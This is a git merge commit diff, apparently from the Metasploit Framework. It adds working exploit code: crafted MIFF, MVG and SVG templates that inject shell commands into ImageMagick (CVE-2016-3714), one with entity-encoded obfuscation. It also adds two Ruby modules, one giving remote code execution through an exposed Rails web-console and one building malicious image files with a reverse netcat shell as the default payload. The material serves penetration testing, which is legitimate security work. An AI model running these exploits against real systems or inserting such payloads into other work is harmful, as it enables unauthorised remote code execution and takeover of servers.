Merge branch 'master' into staging/rails-upgrade

2016-05-06 10:56:17 -05:00 · 2016-05-06 10:56:17 -05:00 · 5a360be459
parent a763863ff3 e4e6246692
commit 5a360be459
5 changed files with 206 additions and 0 deletions
--- a/data/exploits/CVE-2016-3714/msf.miff
+++ b/data/exploits/CVE-2016-3714/msf.miff
@ -0,0 +1,14 @@
 id=ImageMagick  version=1.0
 class=DirectClass  colors=0  matte=False
 columns=1  rows=1  depth=16
 colorspace=sRGB
 page=1x1+0+0
 rendering-intent=Perceptual
 gamma=0.454545
 red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
 white-point=0.3127,0.329
 date:create=2016-05-04T00:19:42-05:00
 date:modify=2016-05-04T00:19:42-05:00
 label={";echo vulnerable"}
 :ÿÿÿÿÿÿ
--- a/data/exploits/CVE-2016-3714/msf.mvg
+++ b/data/exploits/CVE-2016-3714/msf.mvg
@ -0,0 +1,8 @@
 push graphic-context
 encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
 image Over 0,0 1,1 'https://localhost";echo vulnerable"'
 pop graphic-context
 pop graphic-context
--- a/data/exploits/CVE-2016-3714/msf.svg
+++ b/data/exploits/CVE-2016-3714/msf.svg
@ -0,0 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable&#x22;" />
 </svg>
--- a/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
+++ b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
@ -0,0 +1,92 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails Development Web Console (v2) Code Execution',
      'Description'    => %q{
          This module exploits a remote code execution feature of the Ruby on Rails
        framework. This feature is exposed if the config.web_console.whitelisted_ips
        setting includes untrusted IP ranges and the web-console gem is enabled.
      },
      'Author'         => ['hdm'],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://github.com/rails/web-console' ]
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        =>	[ ['Automatic', {} ] ],
      'DefaultOptions' => { "PrependFork" => true },
      'DisclosureDate' => 'May 2 2016',
      'DefaultTarget' => 0))
    register_options(
      [
        Opt::RPORT(3000),
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/missing404"])
      ], self.class)
  end
  #
  # Identify the web console path and session ID, then inject code with it
  #
  def exploit
    res = send_request_cgi({
      'uri'     => normalize_uri(target_uri.path),
      'method'  => 'GET'
    }, 25)
    if ! res
      print_error("Error: No response requesting #{datastore['TARGETURI']}")
      return
    end
    if res.body.to_s !~ /data-mount-point='([^']+)'/
      if res.body.to_s.index("Application Trace") && res.body.to_s.index("Toggle session dump")
        print_error("Error: The web console is either disabled or you are not in the whitelisted scope")
      else
        print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
      end
      return
    end
    console_path = $1 + "/repl_sessions"
    if res.body.to_s !~ /data-session-id='([^']+)'/
      print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
      return
    end
    session_id = $1
    print_status("Sending payload to #{console_path}/#{session_id}")
    res = send_request_cgi({
      'uri'       => console_path + "/" + session_id,
      'method'    => 'PUT',
      'headers'   => {
        'Accept'           => 'application/vnd.web-console.v2',
        'X-Requested-With' => 'XMLHttpRequest'
      },
      'vars_post' => {
        'input' => payload.encoded
      }
    }, 25)
    handler
  end
 end
--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@ -0,0 +1,87 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit
  Rank = ExcellentRanking
  include Msf::Exploit::FILEFORMAT
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',
      'Description'     => %q{
        This module exploits a shell command injection in the way "delegates"
        (commands for converting files) are processed in ImageMagick versions
        <= 7.0.1-0 and <= 6.9.3-9 (legacy).
        Since ImageMagick uses file magic to detect file format, you can create
        a .png (for example) which is actually a crafted SVG (for example) that
        triggers the command injection.
        Tested on Linux, BSD, and OS X. You'll want to choose your payload
        carefully due to portability concerns. Use cmd/unix/generic if need be.
      },
      'Author'          => [
        'stewie',            # Vulnerability discovery
        'Nikolay Ermishkin', # Vulnerability discovery
        'wvu',               # Metasploit module
        'hdm'                # Metasploit module
      ],
      'References'      => [
        %w{CVE 2016-3714},
        %w{URL https://imagetragick.com/},
        %w{URL http://seclists.org/oss-sec/2016/q2/205},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
      ],
      'DisclosureDate'  => 'May 3 2016',
      'License'         => MSF_LICENSE,
      'Platform'        => 'unix',
      'Arch'            => ARCH_CMD,
      'Privileged'      => false,
      'Payload'         => {
        'BadChars'      => "\x22\x27\x5c", # ", ', and \
        'Compat'        => {
          'PayloadType' => 'cmd cmd_bash',
          'RequiredCmd' => 'generic netcat bash-tcp'
        }
      },
      'Targets'         => [
        ['SVG file',  template: 'msf.svg'], # convert msf.png msf.svg
        ['MVG file',  template: 'msf.mvg'], # convert msf.svg msf.mvg
        ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
      ],
      'DefaultTarget'   => 0,
      'DefaultOptions'  => {
        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
        'LHOST'                 => Rex::Socket.source_address,
        'DisablePayloadHandler' => false,
        'WfsDelay'              => 9001
      }
    ))
    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
    ])
  end
  def exploit
    if target.name == 'SVG file'
      p = Rex::Text.html_encode(payload.encoded)
    else
      p = payload.encoded
    end
    file_create(template.sub('echo vulnerable', p))
  end
  def template
    File.read(File.join(
      Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
    ))
  end
 end